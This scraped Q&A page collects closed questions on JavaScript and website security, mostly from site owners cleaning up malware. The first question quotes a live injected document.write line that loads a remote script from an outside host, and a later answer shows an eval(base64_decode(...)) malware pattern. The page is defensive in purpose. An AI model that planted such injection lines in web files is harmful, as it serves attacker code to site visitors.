How to clean my infested javascript code [closed] - javascript

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 9 years ago.
Improve this question
My web site has been infested with a virus. All javascript files contain the following code:
/*a61bd2*/
document.write("<script src='http://www.blog-environnement.fr/wp-admin /DxRcTnm8.php?id=128633385' type='text/javascript'></" + "script>");
/*/a61bd2*/
I can clean it but I have to open each javascript individually to erase the code. I wonder if it is possible with a script to automatically erase this code from all javascripts within my web site?
If this is possible and if someone could give me some tips because as I don't want to have the problem again.
than you all, sorry for my english.

Don't try to clean up your compromised code. Get a clean copy and work with that instead.
Take your server off line
Check your workstation for malware (in case the attack vector was via something like stealing your passwords that way)
Build a clean server
Make sure it has the latest version of all the software / libraries that you depend on
Restore your site from a known good backup
Start monitoring your site to see if it gets compromised again
Examine the logs from the compromised server to see if you can find out the nature of the attack from there
Security audit all your code (both the clean backup and the edited version from the compromised server).

Related

Can i generate a hash of a javascript file to check if it has been edited by the client? [closed]

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 2 years ago.
Improve this question
I am using https://pavlovia.org to run some experiments in behavioral economics in risky-choice. The task requires the subjects to play (or not) different lotteries. The system creates javascript files which it runs on the subject's browser. However, I found it very easy to inspect and edit the javascript which would allow a malicious subject to give themselves an advantage (e.g. increase the probability of a lottery paying out).
If someone makes all the lotteries "win", it will be easy to tell they cheated, but if they boost the probabilities by a small amount it will be very hard.
Other than re-writing everything so that the logic is server-side, I wondered whether it is possible to compute a hash (md5 or sha) of the JS code on the client and sent it back to the server to check wither the JS has been edited. I found several posts related to computing hashes in javascript, but I wasn't sure whether a file could compute its own hash.
I appreciate that a sophisticated user could also hack that part of the code (e.g. copy the original file to another name and then edit the code that takes the hash to point to the original file, or something like that). But i wonder if this technique could be one more barrier to cheating.
The user has the ability to debug the JS code while running and replace values in some variables. Even if JS hashing was possible, it would not prevent that. I believe there is no other way than making part of the crucial logic on the server side.

Check Chrome's certificate keystore javascript, e.g. to determine if a user has already downloaded and installed a certificate [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
I want to check if a user has already been into my site and downloaded the custom certificate (self-signed). I understand that javascript can't do that, but was thinking maybe a way it can check for Chrome? Since Chrome maintains a keystore?
I guess, the only way I was able to figure it out so far is by checking that the URL has https and then subsequently checking the content of the page (e.g. if certificate is untrusted the content would mention something ...) for the absence of errors related to certificate or t=for the existence of the normal content I would expect to be there... Doing that I was abel to overcome this and prompt users to download a package with the custom certificate and instructions etc... Please suggest if anyone has come across a better option.

Are JScrambler services safe for protecting javascript? [closed]

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 6 years ago.
Improve this question
So I recently stumbled upon jscrambler.com
This tool actually allows you to protect your javascript code, its fascinating. However, the service is cloud based and im wondering if this is really ok. Since im actually posting code on their servers. While others cant steal my code, it is still vurnerable to theft from within the the guys behind jscrambler.
Maybe im worrying too much. Is it safe to use jscrambler services?
You're right. Giving your code to a 3rd party to protect it is as counter-productive as it is counter-intuitive.
That said, browser users always have access to the underlying Javascript code. The most you can do is wrangle the source code by making syntactic changes that produce the same functionality but result in harder-to-read text.
This process is known as uglification or minification (since it reduces file size). UglifyJS is the most frequently used tool for this.

Malicious script injecting adware in my Wordpress instance [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
Some malware is injecting this script somewhere in my wordpress main page. I already went through all files in Editor but I find nothing about this. Any idea where can I find it? Its driving me crazy.
This script is injecting adware popups in my wordpress website.
Try downloading the whole theme folder and plugins folder (with all plugins). Then you would need to run search across all those files. Usually malware code is using eval functions so you should search for eval across all those files. Searching one by one would take forever so use grep tool.
For windows I would recommend windows grep
http://www.wingrep.com/
For Mac I would recommend visualGrep app which is paid app and costs around 2 bucks but totally worth it.
If you have linux then you would need to find the software yourself or you can run such a search from the command line. (Actually you can use CLI on any system but I just prefer having app with GUI fur such task)
in 99% of cases (from my experience) you will find something like:
eval(base64_decode('dsalkndsalndsnldakslasdkn'));
That will be the malware code and you should take care of it (remove). If the code is in the plugin, then you should get rid of such a plugin probably.
Hope this helps.

Nodejs is based on javascript, is there a posibilty the user can hack the code [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
For for my Understanding, I want to know if, since NodeJS is based on JavaScript, is there a possibility the end user can hack the code in a way that causes a security vulnerability.
What I mean is since the NodeJS is JavaScript, and JavaScript usually runs at browser, So is there a possibility that the end user who is access the application, can look into the business logic of the application?
In particular do any of JavaScript's known security vulnerabilities or precautions in browser based coding extend to server side programming? Or are there any other specific vulnerabilities peculiar to NodeJS that are not found in other server side languages?
Your javascript code running on node.js is as safe as other server side technologies as this code cannot be actually accessed by the user directly.
But lack of knowledge or errors by the person writing the code can result in security vulnerabilities in any language / platform.

Categories